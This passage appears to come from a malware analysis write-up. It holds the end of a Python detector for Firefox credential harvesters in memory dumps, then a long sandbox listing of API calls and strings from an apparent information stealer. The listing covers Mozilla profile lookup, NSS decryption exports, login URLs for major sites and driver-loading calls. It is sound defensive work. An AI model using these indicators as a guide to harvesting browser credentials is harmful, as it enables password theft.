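                  "record_keys": RECORD_KEYS, "profile_hints": PROFILE_HINTS}
    return {name: [s for s in items if _present(blob, s)]
            for name, items in categories.items()}


def is_harvester(hits: Dict[str, List[str]]) -> bool:
    """Verdict (threshold is this example's assumption): the code must resolve
    PK11SDR_Decrypt plus other NSS exports at runtime AND know where the login
    store lives AND know the logins.json record fields."""
    return ("PK11SDR_Decrypt" in hits["nss_exports"]
            and len(hits["nss_exports"]) >= 3
            and bool(hits["store_files"])
            and bool(hits["record_keys"]))


def _narrow(s: str) -> bytes:
    """NUL-terminated ANSI string as the stealer stores GetProcAddress names."""
    return s.encode("ascii") + b"\x00"


def _wide(s: str) -> bytes:
    """NUL-terminated UTF-16LE string as used by the W-suffixed Win32 calls."""
    return s.encode("utf-16-le") + b"\x00\x00"


def build_stealer_dump() -> bytes:
    """Constructed stand-in for the 0x400000 dump: the strings from the listing,
    in the encodings the code uses them in, separated by zero padding."""
    pad = b"\x00" * 32
    parts = [b"MZ\x90\x00"]
    parts += [_narrow(s) for s in NSS_EXPORTS]
    parts += [_wide("nss3.dll")]
    parts += [_wide(s) for s in STORE_FILES]
    parts += [_narrow(s) for s in RECORD_KEYS]
    parts += [_wide(s) for s in PROFILE_HINTS]
    return pad.join(parts)


def build_benign_dump() -> bytes:
    """Constructed stand-in for a module that merely imports NSS: the same
    export names, but nothing about the profile layout or the login store."""
    pad = b"\x00" * 32
    return pad.join([b"MZ\x90\x00"] + [_narrow(s) for s in NSS_EXPORTS] + [_wide("nss3.dll")])


if __name__ == "__main__":
    for label, dump in (("stealer", build_stealer_dump()), ("benign", build_benign_dump())):
        hits = scan_firefox_harvester(dump)
        print(label, "->", "HARVESTER" if is_harvester(hits) else "clean", hits)
```

On a real dump (for example the 00000008.00000002.*.sdmp file this listing was generated from) the same scan can be run with `scan_firefox_harvester(open(path, "rb").read())`; the benign case shows why a single-category match such as the NSS export names alone must not trip the verdict.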

APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memsetwcscpy$wcslen$_snwprintf$wcscat
• String ID: General$IsRelative$Path$Profile%d$profiles.ini
• API String ID: 3014334669-2600475665
• Opcode ID: 8b331d522e2951b2ba0f7e24a9ab3c25202a03d20dbedb5e26c57a336433e963
• Instruction ID: c42e31a804922eed0ec5ba890dd8b4603cdc71837868ac6ae30ebb97505d8267
• Opcode Fuzzy Hash: 8b331d522e2951b2ba0f7e24a9ab3c25202a03d20dbedb5e26c57a336433e963
• Instruction Fuzzy Hash: 7D51557290122CAAEB20EB55CD45FDEB7BCAF55344F1040E7B508A2151EF789B848F99
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040B5D4: LoadMenuW.USER32 ref: 0040B5DC
                                                                                                                                                                        • SetMenu.USER32(?,00000000), ref: 0040EC7A
                                                                                                                                                                        • CreateStatusWindowW.COMCTL32(50000000,Function_0004552C,?,00000101), ref: 0040EC95
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 0040ECAD
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040ECBC
                                                                                                                                                                        • LoadImageW.USER32 ref: 0040ECC9
                                                                                                                                                                        • CreateToolbarEx.COMCTL32(?,50010900,00000102,00000006,00000000,00000000,?,00000007,00000010,00000010,00000060,00000010,00000014), ref: 0040ECF3
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040ED00
                                                                                                                                                                        • CreateWindowExW.USER32 ref: 0040ED27
                                                                                                                                                                        • memcpy.MSVCRT ref: 0040EDEF
                                                                                                                                                                        • ShowWindow.USER32(?,?), ref: 0040EE25
                                                                                                                                                                        • GetFileAttributesW.KERNEL32(00453928), ref: 0040EE56
                                                                                                                                                                        • GetTempPathW.KERNEL32(00000104,00453928), ref: 0040EE66
                                                                                                                                                                        • wcslen.MSVCRT ref: 0040EE6D
                                                                                                                                                                        • wcslen.MSVCRT ref: 0040EE7B
                                                                                                                                                                        • RegisterWindowMessageW.USER32(commdlg_FindReplace,00000001), ref: 0040EEC8
                                                                                                                                                                        • SendMessageW.USER32(?,00000404,00000002,?), ref: 0040EF02
                                                                                                                                                                        • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 0040EF15
                                                                                                                                                                          • Part of subcall function 00403D7A: wcslen.MSVCRT ref: 00403D97
                                                                                                                                                                          • Part of subcall function 00403D7A: SendMessageW.USER32(?,00001061,?,?), ref: 00403DBB
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Message$SendWindow$Createwcslen$HandleLoadMenuModule$AttributesFileImagePathRegisterShowStatusTempToolbarmemcpy
                                                                                                                                                                        • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html
                                                                                                                                                                        • API String ID: 1225797202-2103577948
                                                                                                                                                                        • Opcode ID: 9d98e6f2fbb5c69645150cf5077508ab95bdd3e46f00e280708d5f032f5596ec
                                                                                                                                                                        • Instruction ID: 8c9b3575536fccf7ef0877cb0e8d9f23cb5666ec72f10922821c14b88f39767b
                                                                                                                                                                        • Opcode Fuzzy Hash: 9d98e6f2fbb5c69645150cf5077508ab95bdd3e46f00e280708d5f032f5596ec
                                                                                                                                                                        • Instruction Fuzzy Hash: B5B1A271540388AFEF11DF64CC89BCA7FA5AF55304F0404BAFA48AF292C7B99544CB69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040E076: memset.MSVCRT ref: 0040E0B9
                                                                                                                                                                          • Part of subcall function 0040E076: memset.MSVCRT ref: 0040E0CE
                                                                                                                                                                          • Part of subcall function 0040E076: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 0040E0E0
                                                                                                                                                                          • Part of subcall function 0040E076: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 0040E0FE
                                                                                                                                                                          • Part of subcall function 0040E076: SendMessageW.USER32(?,00001003,00000001,?), ref: 0040E13B
                                                                                                                                                                          • Part of subcall function 0040E076: ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 0040E14F
                                                                                                                                                                          • Part of subcall function 0040E076: ImageList_SetImageCount.COMCTL32(00000000,00000008), ref: 0040E15A
                                                                                                                                                                          • Part of subcall function 0040E076: SendMessageW.USER32(?,00001003,00000000,?), ref: 0040E172
                                                                                                                                                                          • Part of subcall function 0040E076: ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040E17E
                                                                                                                                                                          • Part of subcall function 0040E076: GetModuleHandleW.KERNEL32(00000000), ref: 0040E18D
                                                                                                                                                                          • Part of subcall function 0040E076: LoadImageW.USER32 ref: 0040E19F
                                                                                                                                                                          • Part of subcall function 0040E076: GetModuleHandleW.KERNEL32(00000000), ref: 0040E1AA
                                                                                                                                                                          • Part of subcall function 0040E076: LoadImageW.USER32 ref: 0040E1BC
                                                                                                                                                                          • Part of subcall function 0040E076: ImageList_SetImageCount.COMCTL32(?,00000000), ref: 0040E1CD
                                                                                                                                                                          • Part of subcall function 0040E076: GetSysColor.USER32(0000000F), ref: 0040E1D5
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040377A
                                                                                                                                                                        • LoadIconW.USER32(00000000,00000072), ref: 00403785
                                                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00403796
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040379A
                                                                                                                                                                        • LoadIconW.USER32(00000000,00000074), ref: 0040379F
                                                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 004037AA
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004037AE
                                                                                                                                                                        • LoadIconW.USER32(00000000,00000073), ref: 004037B3
                                                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,00000002,00000000), ref: 004037BE
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004037C2
                                                                                                                                                                        • LoadIconW.USER32(00000000,00000075), ref: 004037C7
                                                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,00000003,00000000), ref: 004037D2
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004037D6
                                                                                                                                                                        • LoadIconW.USER32(00000000,0000006F), ref: 004037DB
                                                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,00000004,00000000), ref: 004037E6
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004037EA
                                                                                                                                                                        • LoadIconW.USER32(00000000,00000076), ref: 004037EF
                                                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,00000005,00000000), ref: 004037FA
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004037FE
                                                                                                                                                                        • LoadIconW.USER32(00000000,00000077), ref: 00403803
                                                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,00000006,00000000), ref: 0040380E
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00403812
                                                                                                                                                                        • LoadIconW.USER32(00000000,00000070), ref: 00403817
                                                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,00000007,00000000), ref: 00403822
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: IconImage$List_$HandleLoadModule$Replace$CountCreateMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 715923342-0
                                                                                                                                                                        • Opcode ID: 620d69d8077533c60e47300747d931a5e3fb9ffd49415cf9926755a482ff0520
                                                                                                                                                                        • Instruction ID: b7e10a9324f3d83bf9194ece928487740f847c1137f1a2c01f1b8e69b6e47de2
                                                                                                                                                                        • Opcode Fuzzy Hash: 620d69d8077533c60e47300747d931a5e3fb9ffd49415cf9926755a482ff0520
                                                                                                                                                                        • Instruction Fuzzy Hash: 1711F160B857087AFA3137B2DC4BF7B7A5EDF81B85F114414F35D990E0C9E6AC105928
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetFileVersionInfoSizeW.VERSION(0040BDC4,?,00000000), ref: 00443D36
                                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 00443D51
                                                                                                                                                                        • GetFileVersionInfoW.VERSION(0040BDC4,00000000,?,00000000,00000000,0040BDC4,?,00000000), ref: 00443D61
                                                                                                                                                                        • VerQueryValueW.VERSION(00000000,0044A4B4,0040BDC4,?,0040BDC4,00000000,?,00000000,00000000,0040BDC4,?,00000000), ref: 00443D74
                                                                                                                                                                        • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0044A4B4,0040BDC4,?,0040BDC4,00000000,?,00000000,00000000,0040BDC4,?,00000000), ref: 00443DB1
                                                                                                                                                                        • _snwprintf.MSVCRT ref: 00443DD1
                                                                                                                                                                        • wcscpy.MSVCRT ref: 00443DFB
                                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00443EAB
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
                                                                                                                                                                        • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                                        • API String ID: 1223191525-1542517562
                                                                                                                                                                        • Opcode ID: f160691ecdb482a839b0d8bd7ec2443cf0dfcac9d5922b70f5c8bd6361710c8c
                                                                                                                                                                        • Instruction ID: f644ee0d2354bfc8442d092a800b66c1527b1609597f5fb91e8fdc391f94498a
                                                                                                                                                                        • Opcode Fuzzy Hash: f160691ecdb482a839b0d8bd7ec2443cf0dfcac9d5922b70f5c8bd6361710c8c
                                                                                                                                                                        • Instruction Fuzzy Hash: 164133B2900218BAEB04EFA1DD82DDEB7BCAF48704F110517B515A3142DB78EA559BA8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 0040E0B9
                                                                                                                                                                        • memset.MSVCRT ref: 0040E0CE
                                                                                                                                                                        • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 0040E0E0
                                                                                                                                                                        • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 0040E0FE
                                                                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040E117
                                                                                                                                                                        • ImageList_SetImageCount.COMCTL32(00000000,00000008), ref: 0040E122
                                                                                                                                                                        • SendMessageW.USER32(?,00001003,00000001,?), ref: 0040E13B
                                                                                                                                                                        • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 0040E14F
                                                                                                                                                                        • ImageList_SetImageCount.COMCTL32(00000000,00000008), ref: 0040E15A
• SendMessageW.USER32(?,00001003,00000000,?), ref: 0040E172
• ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040E17E
• GetModuleHandleW.KERNEL32(00000000), ref: 0040E18D
• LoadImageW.USER32 ref: 0040E19F
• GetModuleHandleW.KERNEL32(00000000), ref: 0040E1AA
• LoadImageW.USER32 ref: 0040E1BC
• ImageList_SetImageCount.COMCTL32(?,00000000), ref: 0040E1CD
• GetSysColor.USER32(0000000F), ref: 0040E1D5
• ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 0040E1F0
• ImageList_AddMasked.COMCTL32(?,?,?), ref: 0040E200
• DeleteObject.GDI32(?), ref: 0040E20C
• DeleteObject.GDI32(?), ref: 0040E212
• SendMessageW.USER32(00000000,00001208,00000000,?), ref: 0040E22F
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
• String ID:
• API String ID: 304928396-0
• Opcode ID: 0e0f0537c5a9146dc27172f456af1fd8f34a183f9f4551b6ad3cfb99057e354f
• Instruction ID: d1f198460081c9bd407666b3734bdbb6004887ae833e7bd4338906f330e243fe
• Opcode Fuzzy Hash: 0e0f0537c5a9146dc27172f456af1fd8f34a183f9f4551b6ad3cfb99057e354f
• Instruction Fuzzy Hash: F241E975640704BFEB20AF70DC4AF9777ADFB09705F000829F399A91D1CAF5A8508B29
Uniqueness
• Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00406B72
  • Part of subcall function 00413E4F: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,004145EB,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,?), ref: 00413E62
• _wcsnicmp.MSVCRT ref: 00406BE5
• memset.MSVCRT ref: 00406C09
• memset.MSVCRT ref: 00406C25
• _snwprintf.MSVCRT ref: 00406C45
• wcsrchr.MSVCRT ref: 00406C6C
• CompareFileTime.KERNEL32(?,?,00000000), ref: 00406C9F
• wcscpy.MSVCRT ref: 00406CC1
• memset.MSVCRT ref: 00406BBF
  • Part of subcall function 00413EE6: RegEnumKeyExW.ADVAPI32 ref: 00413F09
• RegCloseKey.ADVAPI32(00411799), ref: 00406CF9
• wcscpy.MSVCRT ref: 00406D07
• ExpandEnvironmentStringsW.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104,?,?,?,?,00000000,?), ref: 00406D22
• GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000000,?), ref: 00406D62
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memset$wcscpy$CloseCompareCurrentDirectoryEnumEnvironmentExpandFileOpenStringsTime_snwprintf_wcsnicmpwcsrchr
• String ID: %programfiles%\Mozilla Firefox$%s\bin$PathToExe$SOFTWARE\Mozilla$mozilla
• API String ID: 1094916163-2797892316
• Opcode ID: 07749401729549ea18023a88aae6b7e086f03ff84713cd47a7d93030012f0eb7
• Instruction ID: 3a0c8bae75b73356f025c28445405007b897e2e36fb84af6dfbdfac580efd4a0
• Opcode Fuzzy Hash: 07749401729549ea18023a88aae6b7e086f03ff84713cd47a7d93030012f0eb7
• Instruction Fuzzy Hash: 9961BBB2D04229AAEF20EBA1CC45BDF77BCFF45344F010476E909F2181EB795A548B59
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: wcscat$_snwprintfmemset$wcscpy
• String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
• API String ID: 3143752011-1996832678
• Opcode ID: fea471720f089f9426c79df6b96a0c1db0a5d7cfe671986570c98e4288bdff5f
• Instruction ID: 7b6d47d0ae84673c1440bb3f6a45a38d491a9b2de853a8b7013f3412f20213e7
• Opcode Fuzzy Hash: fea471720f089f9426c79df6b96a0c1db0a5d7cfe671986570c98e4288bdff5f
• Instruction Fuzzy Hash: FC31B9B6504305BAF720EA55DD86EAB73BCDBC1714F20406FF214B2182EB7C99858A5D
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,00409807,?,000000FF,00000000,00000104), ref: 004118FD
• GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00411914
• GetProcAddress.KERNEL32(NtLoadDriver), ref: 00411926
• GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00411938
• GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041194A
• GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 0041195C
• GetProcAddress.KERNEL32(NtQueryObject), ref: 0041196E
• GetProcAddress.KERNEL32(NtSuspendProcess), ref: 00411980
• GetProcAddress.KERNEL32(NtResumeProcess), ref: 00411992
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: AddressProc$HandleModule
• String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
• API String ID: 667068680-2887671607
• Opcode ID: d8ef7826caabcaaffc412af8f074007f850e332e68426ef7b20180a0e9148960
• Instruction ID: 49f1c8a85f5507baf9409120c02bba5f1b3352987f0cf3d6caa0177263683d24
• Opcode Fuzzy Hash: d8ef7826caabcaaffc412af8f074007f850e332e68426ef7b20180a0e9148960
• Instruction Fuzzy Hash: 6C01C8F5D80314BADB216FB1AC8AA053EA5F71C7D3710883BE42452272D778C610CE9C
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: _snwprintfmemset$wcscpy$wcscat
• String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
• API String ID: 1607361635-601624466
• Opcode ID: 9c4e98fc668ec826f20e0b002b8e58c954f250be10c1ab6a9c58bcae2153cd4d
• Instruction ID: 86ecdfe433e0374b5ced7b433421c6295f8700cac4d68a1fbb2313435c6baabf
• Opcode Fuzzy Hash: 9c4e98fc668ec826f20e0b002b8e58c954f250be10c1ab6a9c58bcae2153cd4d
• Instruction Fuzzy Hash: 6561A171900208EFEF14EF94CC85EAE7B79EF45314F1001AAF815A72D2DB38AA55CB54
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: _snwprintf$memset$wcscpy
• String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
• API String ID: 2000436516-3842416460
• Opcode ID: ca54b146358acc6312ccae977809877886edf0d219006698e2b397220b1af42e
• Instruction ID: d19b445dff31b0d86a25f5297df5c333c47444227bfe33656549cbc54b746d40
• Opcode Fuzzy Hash: ca54b146358acc6312ccae977809877886edf0d219006698e2b397220b1af42e
• Instruction Fuzzy Hash: 1D4142B1D40219AAEB20EF95CC85FFB737CFF45304F4540ABB918A2191E7389A948F65
Uniqueness
• Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0040BD76
• memset.MSVCRT ref: 0040BD92
  • Part of subcall function 00408282: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040BE8F,00000000,0040BD42,?,00000000,00000208,?), ref: 0040828D
  • Part of subcall function 00443D20: GetFileVersionInfoSizeW.VERSION(0040BDC4,?,00000000), ref: 00443D36
  • Part of subcall function 00443D20: ??2@YAPAXI@Z.MSVCRT ref: 00443D51
  • Part of subcall function 00443D20: GetFileVersionInfoW.VERSION(0040BDC4,00000000,?,00000000,00000000,0040BDC4,?,00000000), ref: 00443D61
  • Part of subcall function 00443D20: VerQueryValueW.VERSION(00000000,0044A4B4,0040BDC4,?,0040BDC4,00000000,?,00000000,00000000,0040BDC4,?,00000000), ref: 00443D74
  • Part of subcall function 00443D20: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0044A4B4,0040BDC4,?,0040BDC4,00000000,?,00000000,00000000,0040BDC4,?,00000000), ref: 00443DB1
  • Part of subcall function 00443D20: _snwprintf.MSVCRT ref: 00443DD1
  • Part of subcall function 00443D20: wcscpy.MSVCRT ref: 00443DFB
• wcscpy.MSVCRT ref: 0040BDD6
• wcscpy.MSVCRT ref: 0040BDE5
• wcscpy.MSVCRT ref: 0040BDF5
• EnumResourceNamesW.KERNEL32(0040BEF4,00000004,0040BB24,00000000), ref: 0040BE5A
• EnumResourceNamesW.KERNEL32(0040BEF4,00000005,0040BB24,00000000), ref: 0040BE64
• wcscpy.MSVCRT ref: 0040BE6C
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
• String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                                        • API String ID: 3037099051-517860148
                                                                                                                                                                        • Opcode ID: 2fcdf58697040aa4c7eb54e95d53208f650488f18f63fe222914c72976027cdc
                                                                                                                                                                        • Instruction ID: d02a95b1ac945ad733c6c475c60bd1556454897fd3a1253caa6bc47d13ece21f
                                                                                                                                                                        • Opcode Fuzzy Hash: 2fcdf58697040aa4c7eb54e95d53208f650488f18f63fe222914c72976027cdc
                                                                                                                                                                        • Instruction Fuzzy Hash: AD21A9B294021876EB20BB529C46FCB7B6CDF55754F00047BF50871192DBBC9A94C6EE
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

APIs
• LoadLibraryW.KERNEL32(advapi32.dll,?,0040A9C2,?,https://login.yahoo.com/config/login,00000000,http://www.facebook.com/,00000000,https://www.google.com/accounts/servicelogin,00000000,?,00000000,?,00411E75,?,?), ref: 00403C35
• GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00403C49
• GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00403C55
• GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 00403C61
• GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 00403C6D
• GetProcAddress.KERNEL32(?,CryptHashData), ref: 00403C79
• GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 00403C85
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: CryptAcquireContextA$CryptCreateHash$CryptDestroyHash$CryptGetHashParam$CryptHashData$CryptReleaseContext$advapi32.dll
• API String ID: 2238633743-1621422469
• Opcode ID: 75ed6b8b2212405dc2e3096810b13c68b16b60bade9346944bfe3eeaaf52b7e4
• Instruction ID: d7a6577b60cfc464e8e16958ee64dd601e1a2e2a5708563609cb1b578f097ad1
• Opcode Fuzzy Hash: 75ed6b8b2212405dc2e3096810b13c68b16b60bade9346944bfe3eeaaf52b7e4
• Instruction Fuzzy Hash: A2F0F974940B44AFEF306F769D49E06BEF0EFA87017214D2EE0C1A3651D7B99100CE48
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00407D7B: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,00444305,00000000,?,00000000,00000000,0041274B,?,?), ref: 00407D8D
• GetFileSize.KERNEL32(00000000,00000000,00000000,00000001,00000000,?,00407C89,?,?,?,0000001E), ref: 00407760
• ??2@YAPAXI@Z.MSVCRT ref: 00407774
  • Part of subcall function 0040897D: ReadFile.KERNELBASE(?,?,CCD,00000000,00000000,?,?,00444343,00000000,00000000), ref: 00408994
• memset.MSVCRT ref: 004077A6
• memset.MSVCRT ref: 004077C8
• memset.MSVCRT ref: 004077DD
• strcmp.MSVCRT ref: 0040781C
• strcpy.MSVCRT(?,?,?,?,?,?), ref: 004078B2
• strcpy.MSVCRT(?,?,?,?,?,?), ref: 004078D1
• memset.MSVCRT ref: 004078E5
• strcmp.MSVCRT ref: 00407949
• ??3@YAXPAX@Z.MSVCRT ref: 0040797B
• CloseHandle.KERNEL32(?,?,00407C89,?,?,?,0000001E), ref: 00407984
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memset$File$strcmpstrcpy$??2@??3@CloseCreateHandleReadSize
• String ID: ---
• API String ID: 3751793120-2854292027
• Opcode ID: 2a857cbeb5ab5e1bd89b1bc0351e99f96f5a4f3ec23066d0f11bd49c9005f69b
• Instruction ID: 5eab4b77d8efc932d29ad1d752f1a4839dd8d7bf75d011c8978729a0abaaed7e
• Opcode Fuzzy Hash: 2a857cbeb5ab5e1bd89b1bc0351e99f96f5a4f3ec23066d0f11bd49c9005f69b
• Instruction Fuzzy Hash: 856159B2C0416D9ADF20EB948C859DEBB7C9B15314F1041FBE518B3141DA385FC4CBA9
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryW.KERNEL32(psapi.dll,?,00411582), ref: 00412FAC
• GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00412FC5
• GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00412FD6
• GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 00412FE7
• GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00412FF8
• GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413009
• FreeLibrary.KERNEL32(00000000), ref: 00413029
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: AddressProc$Library$FreeLoad
• String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
• API String ID: 2449869053-70141382
